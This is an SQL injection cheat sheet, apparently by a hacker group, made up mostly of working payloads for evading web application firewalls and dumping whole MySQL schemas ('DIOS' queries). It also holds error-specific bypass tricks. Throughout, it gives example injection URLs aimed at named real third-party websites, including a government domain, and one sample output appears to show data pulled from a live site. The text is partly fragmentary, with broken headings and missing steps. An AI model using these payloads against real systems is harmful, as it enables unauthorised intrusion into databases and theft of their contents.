SQL Injection WAF Bypassing Shortcut
SQL Injection WAF Bypassing Shortcut
FB.me/Gaza.Hacker.Injector
Credit to
JaNuS18
benzi
r3dcat
Contents
•◘╚╦☆ Rule_One_For_Test_Site_To_SQL_Injection ☆╚╦◘•
1- LPAD |
2- reverse |
3- insert |
4- make_set |
5- Export Set |
6- replace |
7- Complete Information DIOS |
8- Database.Table.Column IN A Framed Table |
9- Table.Column With All Recording |
•◘╚╦☆ Rule_One_For_Test_Site_To_SQL_Injection ☆╚╦◘•
To test site for SQL Injection you are adding after the variable number TO site
Some Example
https://jdclement.com/en/amis.php?id=73489"
https://pizzacrust.com.pk/deals.php?id=38"
http://www.alphaonenow.org/story.php?news_id=.5597
http://www.alphaonenow.org/story.php?news_id=5597'
http://www.alphaonenow.org/story.php?news_id=\
http://www.alphaonenow.org/story.php?news_id=.5597 order by 100 -- -
Some Example
The UNION operator is used to combine the result-set of two or more SELECT statements.
1- Each SELECT statement within UNION must have the same number of columns
2- The columns must also have similar data types
3- The columns in each SELECT statement must also be in the same order
/*!00000*/
/**/
/*x*/
/**x**/
/*%26*/
/%2A%2A/
%2f**%2f
MySQL Server supports some variants of C-style comments. These enable you to write code that
includes MySQL extensions, but is still portable, by using comments of the following form :
Example ⬎
From a /* sequence to the following */ sequence, as in the C programming language. This syntax
enables a comment to extend over multiple lines because the beginning and closing sequences
need not be on the same line.
2- WhiteSpace Block
This method will apply the Find and Replace feature to replace blank spaces with nothing or
underscore/dash/comma/%0a from selected cells easily.
%0a
%0b
%0d
%C0
%20
%09
%0c
%a0
Example ⬎
PHP Code:
And%a01 Uni On%a0dIstiNctRoW SeL EcT
PHP Code:
%0duni on%0dsel ect%0d
the firewall is blocking the combine use of uni on and sel ect so the waf bypass should be applied
in between uni on and select words .
Query ⬎
And/**/.0union/*%26*/distinctROW+select
And .0UnIOn-- -%0ASeLe%43t
or .0union/**/distinctrow select/**/distinctrow
And .0union/**/distinctrow select/**/distinctrow
id=1.unioN/**/distinct%20%73eleCt""a
id=1%.0unioN/**/distinct%20%73eleCt+-!~
id=1%""unioN/**/distinct%20%73eleCt@$%
id=1%''unioN/**/distinct%20%73eleCt@%C0%
id=1-.0unioN/**/distinct%20%73eleCt@%C0/
id=1=\NunioN/**/distinct%20%73eleCt@%FF|
id=1<0.unioN/**/distinct%20%73eleCt@=
id=1>0.unioN/**/distinct%20%73eleCt~.
id=1e0unioN/**/distinct%20%73eleCt""$
id=1^0.unioN/**/distinct%20%73eleCt!~
id=1|""unioN/**/distinct%20%73eleCt\N$
id=1|''unioN/**/distinct%20%73eleCt\N%FF
id=1|.0unioN/**/distinct%20%73eleCt!@
id=1|\NunioN/**/distinct%20%73eleCt""/
space %20
! %21
" %22
# %23
$ %24
% %25
& %26
' %27
( %28
) %29
* %2A
Example ⬎
Letter case (or just case) is the distinction between the letters
that are in larger upper case (also uppercase, capital letters,
capitals, caps, large letters, or more formally majuscule) and
smaller lower case (also lowercase, small letters, or more formally
minuscule) in the written representation of certain .
Example ⬎
Union Select
unioN seleCt
UNIoN SELeCt
6- Gear Fourth
Query ⬎
or .0union/**/distinctrow%23GearFourth%0aselect/**/distinctrow
And .0union/**/distinctrow%23GearFourth%0aselect/**/distinctrow
or .0union/**/distinctrow
%23GearFourthBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBB%0aselect/**/distinctrow
And .0union/**/distinctrow
%23GearFourthBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
BBBBBBBBBBBBBBBBBBBBBBBBBBBB%0aselect/**/distinctrow
Example ⬎
Query ⬎
ID=.4||!{f`id`}union-- a%0Aselect@
|| means "or" .
Example ⬎
http://www.bellajoias.com.br/categoria.php?id={f -3}union-- a
%0Aselect@,2,3,4,5,6,7#
☆¸.•*☆ :: Public Error Solution :: ☆*•.¸☆
Query ⬎
id=.1union-- a%0Aselect
id=1-.1union- a%0Aselect
id=1'e0union- a%0Aselect
id=\Nunion- a%0Aselect
id=1 *9e0union-- -%0aselect
Example ⬎
Example ⬎
its happening because the url table and our table got different
collations
Example ⬎
ascii
ujis
ucs2
tis620
swe7
sjis
macroman
macce
latin7
latin5
latin2
koi8u
koi8r
keybcs2
hp8
geostd8
gbk
gb2132
armscii8
ascii
cp1250
big5
cp1251
cp1256
cp1257
cp850
cp852
cp866
cp932
dec8
euckr
latin1
utf8
3- unhex(hex(value))
4- uncompress(compress(version()))
5- aes_decrypt(aes_encrypt(value,1),1)
6- binary(value)
Solution ⬎
Example ⬎
www.i2t2.com/index1.php?id=2'
+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))
+having+min(0)+or+1-- -
5- Error Name : Fatal Error Occurred
Example ⬎
To Bypassing This Error I Will Nulling All Column's One By One Until
I See Good Login With Vuln Column Number In The Page
when you see this error come to you with using union select the
solution well be like this example
Error 404 Not Found is A very common mistake , but when this error come to you, when
you use the query to get table name information, that’s mean the waf block the dot . In
information_Schema.tables
Example ⬎
the site work good, but here when I try to get table name I get error
404 Not Found as you see
The server does not meet one of the preconditions that the requester
put on the request.
Example ⬎
the solution will be by delete the space between group and the
variable number like.
http://www.lict.gov.bd/oldlict/archivesDetails.php?id=.8group By
100-- -
but if this error come to you with your full query like here
http://www.lict.gov.bd/oldlict/archivesDetails.php?id=.8 /*!
50000Union*/ Select 1,unhex(hex(/*!50000ConCat*/(version(),/*!
50000ConCat*/(@c:=0x00,if((/*!50000%53elect*/ count(*)%0A/*!
50000From*/%0A/*!50000Information_Schema*/.Columns where
table_schema=database() and @c:=/*!50000ConCat*/(@c,0x3c6c693e,/*!
50000Table_name*/,0x2e,/*!
50000Column_name*/)),0x00,0x00),@c)))),3,4,5
1- unhex(hex(/*!50000ConCat*/(version(),/*!50000ConCat*/
(@c:=0x00,if((/*!50000%53elect*/ count(*)%0A/*!50000From*/%0A/*!
50000Information_Schema*/.Columns where table_schema=database() and
@c:=/*!50000ConCat*/(@c,0x3c6c693e,/*!50000Table_name*/,0x2e,/*!
50000Column_name*/)),0x00,0x00),@c))))
http://www.lict.gov.bd/oldlict/archivesDetails.php?id=.8 /*!
50000Union*/ Select 1,unhex(hex(/*!50000ConCat*/(version(),/*!
50000ConCat*/(@c:=0x00,if((/*!50000%53elect*/ count(*)%0A/*!
50000From*/%0A/*!50000Information_Schema*/.Columns where
table_schema=database() and @c:=/*!50000ConCat*/(@c,0x3c6c693e,/*!
50000Table_name*/,0x2e,/*!
50000Column_name*/)),0x00,0x00),@c)))),3,4,5
http://www.lict.gov.bd/oldlict/archivesDetails.php?id=.8 /*!
50000Union*/ Select
1,concat(concat( 0x3c62723e,0x2e2e4e616d65203a3a2050697368696361745f
496e6a6563746f72,0x3c62723e,0x2e2e56657273696f6e203a3a20,version(),0x
3c62723e,0x2e2e4461746162617365203a3a20,DataBasE(),0x3c62723e,0x2e2e5
5736572203a3a20,UsEr(),0x3c62723e,0x3c62723e,0x2e2e44696f73203a3a20,0
x3c62723e,0x3c62723e, concat(@c:=0x00,if((/*!50000select*/
count(*) /*!50000from*/ /*!50000information_schema*/ . /*!
50000columns*/ /*!50000where*/ /*!50000table_schema*/=/*!
50000database*/() and @c:=concat(@c,0x3c6c693e,/*!
50000table_schema*/,0x2e,/*!50000table_name*/,0x2e,/*!
50000column_name*/)),0x00,0x00),@c)),0x3c696d67207372633d22),3,4,5
9- Error 418 Unused
Example ⬎
concat/*!((/*!00000select*/(@)/*!from*/(/*!00000select*/(@:=0x00),
(/*!00000select*/(@)/*!00000from*/(/*!00000information_schema*/ .
schemata)/*!00000where*/(@)in(@:=concat/*!
(@,0x3c62723e,unhex(hex(schema_name))))))x))*/
(select @ from(select+@:=0x00,
(select+@+from+information_schema.Columns where
table_schema=database() and+@:=concat(@,/*!
50000table_schema*/,0x2e,/*!50000Table_name*/,0x2e,/*!
50000Column_name*/,0x0a)))a)
(/*!50000select*/ @ /*!50000from*/(/*!50000select*/+@:=0x00,(/*!
50000select*/+@+/*!50000from*/+/*!50000information_schema*/ . /*!
50000Columns*/ /*!50000where*/ /*!50000table_schema*/=/*!
50000database*//**/() and+@:=/*!50000concat*/(@,/*!
50000table_schema*/,0x2e,/*!50000Table_name*/,0x2e,/*!
50000Column_name*/,0x0a)))a)
uncompress(compress((select @ from(select+@:=0x00,
(select+@+from+information_schema.Columns where
table_schema=database() and+@:=concat(@,/*!
50000table_schema*/,0x2e,/*!50000Table_name*/,0x2e,/*!
50000Column_name*/,0x0a)))a)))
http://www.risler.com.ar/news.php?id=-6' union select
1,concat('BlackRose :: ',0x2e,'..Version :: ' ,
0x2e,version(),0x2e,'..User :: ',0x2e,user(),0x2e,'..Database ::
',0x2e,database(),0x2e,'..Dios :: ',0x2e,(select @
from(select+@:=0x00,(select+@+from+information_schema.Columns where
table_schema=database() and+@:=concat(@,/*!
50000table_schema*/,0x2e,/*!50000Table_name*/,0x2e,/*!
50000Column_name*/,0x0a)))a)),3,4-- -
10- ERROR 502 - BAD GATEWAY
this error is block query and to bypassing this error just you need
to use unhex(hex(query))
Example ⬎
http://arashidynamics.com/products_detail.php?id=-52+/*!50000unION*/
+/*!50000SEleCT*/
+1,2,unhex(hex(schema_name)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1
9,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,4
2,43,44+from+/*!information_schema*/.schemata+/*!12345LiMit*/ 1,1--
11- Error: (1054) Unknown column 'xxx' in 'field list'
As you can see in this error, there is no 'xxx' column in the query,
its `xxx`
Normal Example ⬎
http://www.icast.org.in/news/related.php?id=.24990' union
select 1,2,3,4,5,6,7,8,9,10,11-- -
Now there error with our query >>> Illegal mix of collations, its
happening because the url table and our table got different
collations, the solution will be by using convert.
Version is 4.1.7-log
12- Query failed: Unknown column '1' in 'order clause'
Example ⬎
http://www.outsourcing-today.ro/articol.php?id=6642' order by 1 -- -
so when you see this error that’s mean you need to limit your
subquery to only one result row +limit+0,1 .
Example ⬎
www.xxx.com/products.php?catid=101+UNION+SELECT+1,2,
(select+llitemnumber+from+orders),4,5,6,7--
www.xxx.com/products.php?catid=101+UNION+SELECT+1,2,
(select+id+from+categories LIMIT 0,1),4,5,6,7--
14- The Injection Is Before ^ from mode
Example ⬎
https://www.tirol-taxi.at/index.php?lID=1'
1064: You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use
near '\' AS name, subtitle_1\' AS sub, seoname_1\' AS seoname,
template, content_1\' A' at line 1
when we see multiple "AS" and commas, we know the injection is before
"from" , the injection is inside "select" and before "from",so we can
use I.Q.D method ' inject the query directly ' with out using union
based query .
https://www.tirol-taxi.at/index.php?lID=1,2
15-The Injection point is after ^ From mode
Example ⬎
when I try to extract data from the column by using Polygon() I get error ‘Operand should
contain 1 column’ Cuz my inner query is returning two columns.
Example ⬎
http://www.soarland.com/CF_Card_Adapter-catalog-41 and
polygon((select * from(select * from
C277915_shledlights.snh_base_admin)p)).html
select * from
select 1 from
http://www.soarland.com/CF_Card_Adapter-catalog-41 and
polygon((select 1 from(select * from
C277915_shledlights.snh_base_admin)p)).html
17- Error as New Line
Example ⬎
www.purichpublishing.com/?
module=swm_ecommerce&page=product_detail&categoryID=3' and 0 union
select 1,2,3,4,5,6,7-- -
DEBUGING MODE...
There was an error in the SWM MySQL query. Here's some debug information:
because this line meaning is just order by c column of the url query
Coz this query continues to a new line, so we can't use -- , %23 Cos
its same with --%0a
and the solution will be by adding Comment Out Query only like
%60 = `
www.arceducation.ac/newsdetails.php?newsId=5
www.diabor.it/en/new.php?id=6
☆¸.•*☆ :: Dios that’s solution for some error :: ☆*•.¸☆
(/*!50000select*/ @ /*!50000from*/(/*!50000select*/+@:=0x00,(/*!
50000select*/+@+/*!50000from*/+/*!50000information_schema*/ . /*!
50000Columns*/ /*!50000where*/ table_schema=database() and+@:=/*!
50000concat*/(@,/*!50000table_schema*/,0x2e,/*!
50000Table_name*/,0x2e,/*!50000Column_name*/,0x0a)))a)
(/*!50000select*/ @ /*!50000from*/(/*!50000select*/+@:=0x00,(/*!
50000select*/+@+/*!50000from*/+/*!50000information_schema*/ . /*!
50000Columns*/ /*!50000where*/ /*!50000table_schema*/=/*!
50000database*//**/() and+@:=/*!50000concat*/(@,/*!
50000table_schema*/,0x2e,/*!50000Table_name*/,0x2e,/*!
50000Column_name*/,0x0a)))a)
| White Page |
(/*!50000SELECT*/+(@x)+/*!50000%46rom*/+(/*!50000SELECT*/+(@x:=0x00),
(@NR_DB:=0),(/*!50000SELECT*/+(0)+/*!50000%46rom*/+(/*!
50000INFORMATION_SCHEMA.columns*/ )+WHERE+(@x)+IN+(@x:=/*!
12345CONCAT(@x,LPAD(@NR_DB:=@NR_DB
%2b1,2,0x30),0x20203a2020,table_schema,0x3a,table_name,0x3a,column_na
me,0x3c62723e)*/)))x)
make_set(6,@:=0x0a,(/*!00000select*/%0b(1)%0b/*!00000%66rom*/%0b(%23H
%0a/*!00000%69nformation_schema*/%0b.%0bcolumns)%0bwhere
%0b@:=make_set(511,@,0x3c6c693e,/*!00000table_schema*/,0x203a3a20,/*!
00000table_name*/,0x203a3a20,/*!00000column_name*/)),@)
| Surce Down |
concat(0x223e,
concat( 0x3c62723e,0x2e2e4e616d65203a3a2050697368696361745f496e6a656
3746f72,0x3c62723e,0x2e2e56657273696f6e203a3a20,version(),0x3c62723e,
0x2e2e4461746162617365203a3a20,DataBasE(),0x3c62723e,0x2e2e5573657220
3a3a20,UsEr(),0x3c62723e,0x3c62723e,0x2e2e44696f73203a3a20,0x3c62723e
,0x3c62723e, concat(@c:=0x00,if((/*!50000select*/ count(*) /*!
50000from*/ /*!50000information_schema*/ . /*!50000columns*/ /*!
50000where*/ /*!50000table_schema*/=/*!50000database*/() and
@c:=concat(@c,0x3c6c693e,/*!50000table_schema*/,0x2e,/*!
50000table_name*/,0x2e,/*!
50000column_name*/)),0x00,0x00),@c)),0x3c696d67207372633d22)
concat(0x223e,version())
concat(0x273e27,version(),0x3c212d2d)
concat(0x223e,version(),0x3c696d67207372633d22)
concat(0x223e3c62723e,version(),0x3c696d67207372633d22)
concat(0x273c2f7469746c653e27,version(),0x273c7469746c653e27)
concat(0x223e,0x3c62723e3c62723e3c62723e,version(),0x3c696d6720737263
3d22,0x3c62723e)
| Illegal Mix Of Collations Error |
1- Illegal
unhex(hex(/*!50000ConCat*/(version(),/*!50000ConCat*/
(@c:=0x00,if((/*!50000%53elect*/ count(*)%0A/*!50000From*/%0A/*!
50000Information_Schema*/.Columns where table_schema=database() and
@c:=/*!50000ConCat*/(@c,0x3c6c693e,/*!50000Table_name*/,0x2e,/*!
50000Column_name*/)),0x00,0x00),@c))))
Mix 2- Unused
uncompress(compress((select @ from(select+@:=0x00,
(select+@+from+information_schema.Columns where
table_schema=database() and+@:=concat(@,/*!
50000table_schema*/,0x2e,/*!50000Table_name*/,0x2e,/*!
50000Column_name*/,0x0a)))a)))
3- White Page
aes_decrypt(aes_encrypt((/*!50000SELECT*/+(@x)+/*!50000FROM*/+(/*!
50000SELECT*/+(@x:=0x00),(@NR_DB:=0),(/*!50000SELECT*/+(0)+/*!
50000FROM*/+(/*!50000INFORMATION_SCHEMA.columns*/ )+WHERE+(@x)+IN+
(@x:=/*!12345CONCAT(@x,LPAD(@NR_DB:=@NR_DB
%2b1,2,0x30),0x20203a2020,table_schema,0x3a,table_name,0x3a,column_na
me,0x3c62723e)*/)))x),1),1)
| Precondition Failed |
concat(0x223e,
concat( 0x3c62723e,0x2e2e4e616d65203a3a2050697368696361745f496e6a656
3746f72,0x3c62723e,0x2e2e56657273696f6e203a3a20,version(),0x3c62723e,
0x2e2e4461746162617365203a3a20,DataBasE(),0x3c62723e,0x2e2e5573657220
3a3a20,UsEr(),0x3c62723e,0x3c62723e,0x2e2e44696f73203a3a20,0x3c62723e
,0x3c62723e, concat(@c:=0x00,if((/*!50000select*/ count(*) /*!
50000from*/ /*!50000information_schema*/ . /*!50000columns*/ /*!
50000where*/ /*!50000table_schema*/=/*!50000database*/() and
@c:=concat(@c,0x3c6c693e,/*!50000table_schema*/,0x2e,/*!
50000table_name*/,0x2e,/*!
50000column_name*/)),0x00,0x00),@c)),0x3c696d67207372633d22)
concat(concat( 0x3c62723e,0x2e2e4e616d65203a3a2050697368696361745f49
6e6a6563746f72,0x3c62723e,0x2e2e56657273696f6e203a3a20,version(),0x3c
62723e,0x2e2e4461746162617365203a3a20,DataBasE(),0x3c62723e,0x2e2e557
36572203a3a20,UsEr(),0x3c62723e,0x3c62723e,0x2e2e44696f73203a3a20,0x3
c62723e,0x3c62723e, concat(@c:=0x00,if((/*!50000select*/ count(*) /*!
50000from*/ /*!50000information_schema*/ . /*!50000columns*/ /*!
50000where*/ /*!50000table_schema*/=/*!50000database*/() and
@c:=concat(@c,0x3c6c693e,/*!50000table_schema*/,0x2e,/*!
50000table_name*/,0x2e,/*!
50000column_name*/)),0x00,0x00),@c)),0x3c696d67207372633d22)
☆¸.•*☆ :: SQLI Dios Query :: ☆*•.¸☆
| LPAD |
LPAD(concat('..Name :: BlackRose',0x203a3a20,0x2e,'<br>','..Version ::
',version(),0x3c62723e,'..Database :: ',database(),0x3c62723e,'..User :: ',user(),0x2e,'<br>',
(select(@x)f%72om(select(@x:=0x00),(select(0)f
%72om(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat
+(@x,0x3c62723e,table_schema,0x203a20,table_name,0x203a20,column_name))))x)),10000,0x00)
| reverse |
(select reverse(insert(0x1,1,0,reverse(concat
(unhex(hex(group_concat(0x3c6c693e,table_schema,0x203a3a20,Table_name,0x203a3a20,Colum
n_name))),0x3c62723e))))+from information_schema 0.e.columns where
table_schema=database())
| insert |
insert(insert(insert(insert(insert(insert(insert(insert(insert(insert((select(@a)from(select(@a:=0x0
0),(select(@a)from(information_schema.columns)where(table_schema!
=0x696e666f726d6174696f6e5f736368656d61)and(@a)in(@a:=insert(0x3c2f666f6e743e,1,0,insert(
@a,1,0,insert(column_name,1,0,insert(0x203a3a20,1,0,insert(table_name,1,0,0x3c62723e))))))))a),
1,0,database()),1,0,0x4461746162617365203a3a20),1,0,0x3c62723e),1,0,user()),1,0,0x55736572203
a3a20),1,0,0x3c62723e),1,0,version()),1,0,0x56657273696f6e203a3a20),1,0,0x3c62723e),1,0,0x496e
6a656374656420427920426c61636b526f7365)
| make_set |
make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where
@:=make_set(511,@,0x3c6c693e,table_schema,0x203a20,table_name,0x203a20,column_name)),
@)
make_set(6,@:=0x0a,(/*!00000select*/(1)/*!00000from*/(/*!00000information_schema*/ .
columns)where@:=make_set(511,@,0x3c6c693e,/*!00000table_schema*/,0x203a3a20,/*!
00000table_name*/,0x203a3a20,/*!00000column_name*/)),@)
| Export Set |
export_set(5,@:=0,(select
count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0
x3c6c693e,2),column_name,0xa3a,2)),@,2)
export_set(5,@:=0,(select+count(*)/*!50000from*/+/*!
50000information_schema*/.columns+where@:=export_set%285,export_set
%285,@,0x3c6c693e,/*!50000column_name*/,2),0x3a3a,/*!50000table_name*/,2)),@,2)
export_set(5,@:=0,(select+count(*)/*!50000from*/+/*!50000information_schema*/.columns
where table_schema=database() and @:=export_set(5,export_set%285,@,0x3c6c693e,/*!
50000column_name*/,2),0x3a3a,/*!50000table_name*/,2)),@,2)
| replace |
replace(replace(0x21402324255e262a3f2b22,0x21,(select concat_ws(0x00,
(select(@)from(select(@:=0x00),
(select(@)from(information_schema.columns)where(table_schema=database())and(0x00)in(@:=c
oncat_ws(0x00,(@),(0x3c62723e),(table_schema),(0x203a3a20),(table_name),(0x203a3a20),
(column_name)))))x)))),0x40,0x3c62723e)
replace(replace(replace(0x232425,0x23,@:=replace(replace(replace(replace(0x753c62723e763c62
723e773c62723e78,0x75,0x3c666f6e7420636f6c6f723d7265642073697a653d3530303e496e6a65637
46f72426f793c2f666f6e743e3c62723e),0x76,version()),0x77,user()),0x78,database())),0x24,
(select+count(*)from(information_schema.columns)where+table_schema=database()
+and@:=replace(replace(replace(0x03c62723e2a3a3a2d,0x00,@),0x2a,table_name),0x2d,column_
name))),0x25,@)
| Complete Information DIOS |
Concat(0x2e2e4e616d65203a3a3a3a3a3a3a3a3a3a2050697368696361745f496e6a6563746f72,0x3c
62723e,0x2e2e56657273696f6e203a3a3a3a3a3a3a20,@@`version`,0x3c62723e,0x2e2e55736572203
a3a3a3a3a3a3a3a3a3a20,current_user(),0x3c62723e,0x2e2e4461746162617365203a3a3a3a3a3a20,
database(),0x3c62723e,0x2e2e404064617461646972203a3a3a3a3a20,@@datadir,0x3c62723e,0x2e
2e53796d6c696e6b203a3a3a3a3a3a3a20,@@HAVE_SYMLINK,0x3c62723e,0x2e2e486f7374204e
616d65203a3a3a3a3a20,@@HOSTNAME,0x3c62723e,0x2e2e46696c652053797374656d203a3a3a
20,@@CHARACTER_SET_FILESYSTEM ,
0x3c62723e,0x2e2e426974732044657461696c73203a3a20,@@VERSION_COMPILE_MACHINE
,0x3c62723e,0x2e2e546d70446972203a3a3a3a3a3a3a3a20,@@tmpdir,0x3c62723e,0x2e2e506f7274
203a3a3a3a3a3a3a3a3a3a20,@@port,0x3c62723e,0x3c62723e,0x2e2e44696f73203a3a20,0x3c6272
3e,0x3c62723e,(select(@a)from(select(@a:=0x00),
(select(@a)from(information_schema.columns)where(table_schema!
=0x696e666f726d6174696f6e5f736368656d61)and(@a)in(@a:=concat(@a,table_schema,0x203a3a
20,table_name,0x203a3a20,column_name,0x3c62723e))))a))
/*!00000concat*/
(0x3c666f6e7420666163653d224963656c616e6422207374796c653d22636f6c6f723a7265643b74657
8742d736861646f773a307078203170782035707820233030303b666f6e742d73697a653a3330707822
3e496e6a65637465642062792041686d656420456c204d656c656779203c2f666f6e743e3c62723e3c66
6f6e7420636f6c6f723d70696e6b2073697a653d353e44622056657273696f6e203a20,version(),0x3c62
723e44622055736572203a20,user(),0x3c62723e3c62723e3c2f666f6e743e3c7461626c6520626f72646
5723d2231223e3c74686561643e3c74723e3c74683e44617461626173653c2f74683e3c74683e5461626
c653c2f74683e3c74683e436f6c756d6e3c2f74683e3c2f74686561643e3c2f74723e3c74626f64793e,
(select (@x) /*!00000from*/ (select (@x:=0x00),(select (0) /*!00000from*/
(information_schema/**/.columns) where (table_schema!
=0x696e666f726d6174696f6e5f736368656d61) and (0x00) in (@x:=/*!00000concat*/
(@x,0x3c74723e3c74643e3c666f6e7420636f6c6f723d7265642073697a653d333e266e6273703b266e
6273703b266e6273703b,table_schema,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c
74643e3c666f6e7420636f6c6f723d677265656e2073697a653d333e266e6273703b266e6273703b266e
6273703b,table_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e
7420636f6c6f723d626c75652073697a653d333e,column_name,0x266e6273703b266e6273703b3c2f6
66f6e743e3c2f74643e3c2f74723e))))x))
..Name :: Pishicat_Injector
..Version :: 5.6.31-log
..User :: gasp_r@%
..Database :: gasp_gaspco1
Databases :~ [383]
Tables :~ [94]
Columns :~ [870]
1. CHARACTER_SET_NAME
2. DEFAULT_COLLATE_NAME
| Table.Column With All Recording |
(select+concat(0x2e2e4e616d65203a3a2050697368696361745f496e6a6563746f72,0x3c62723e,0x2e
2e56657273696f6e203a3a20,@@`version`,0x3c62723e,0x2e2e55736572203a3a20,current_user(),0
x3c62723e,0x2e2e4461746162617365203a3a20,database(),0x3c62723e,0x3c666f6e7420636f6c6f723
d7265643e3c62723e,0x446174616261736573203a7e205b,
(Select+count(Schema_name)from(information_Schema.schemata)),0x5d3c62723e5461626c65732
03a7e205b,
(Select+count(table_name)from(information_schema.tables)),0x5d3c62723e436f6c756d6e73203a7
e205b,
(Select+count(column_name)from(information_Schema.columns)),0x5d3c62723e,@)from(select(
@:=0x00),(@db:=0),(@db_nr:=0),(@tbl:=0),(@tbl_nr:=0),(@col_nr:=0),
(select(@)from(information_Schema.columns)where(@)in(@:=concat(@,if((@db!
=table_schema),concat((@tbl_nr:=0x00),0x3c666f6e7420636f6c6f723d7265643e,LPAD(@db_nr:=
@db_nr
%2b1,2,0x20),0x2e20,@db:=table_schema,0x2020202020203c666f6e7420636f6c6f723d707572706
c653e207b205461626c6573203a7e205b,
(Select+count(table_name)from(information_schema.tables)where(table_schema=@db)),0x5d7d2
03c2f666f6e743e3c2f666f6e743e),0x00),if((@tbl!
=table_name),concat((@col_nr:=0x00),0x3c646976207374796c653d70616464696e672d6c6566743
a343070783b3e3c666f6e7420636f6c6f723d626c75653e202020,LPAD(@tbl_nr:=@tbl_nr
%2b1,3,0x0b),
0x2e20,@tbl:=table_name,0x20202020203c666f6e7420636f6c6f723d707572706c653e2020207b202
0436f6c756d6e73203a7e20205b,
(Select+count(column_name)from(information_Schema.columns)where(table_name=@tbl)),0x5d
202f203c666f6e7420636f6c6f723d626c61636b3e205265636f726473203a7e205b,
(Select+ifnull(table_rows,0x30)+from+information_schema.tables+where+table_name=@tbl),0x5
d207d3c2f666f6e743e3c2f666f6e743e3c2f666f6e743e3c2f6469763e),0x00),concat(0x3c64697620737
4796c653d70616464696e672d6c6566743a383070783b3e3c666f6e7420636f6c6f723d677265656e3e,
LPAD(@col_nr:=@col_nr
%2b1,3,0x0b),0x2e20,column_name,0x3c2f666f6e743e3c2f6469763e)))))x)
Regards
Ahmed El Melegy
FB.me/Gaza.Hacker.Injector
https://www.facebook.com/Melegy.GHI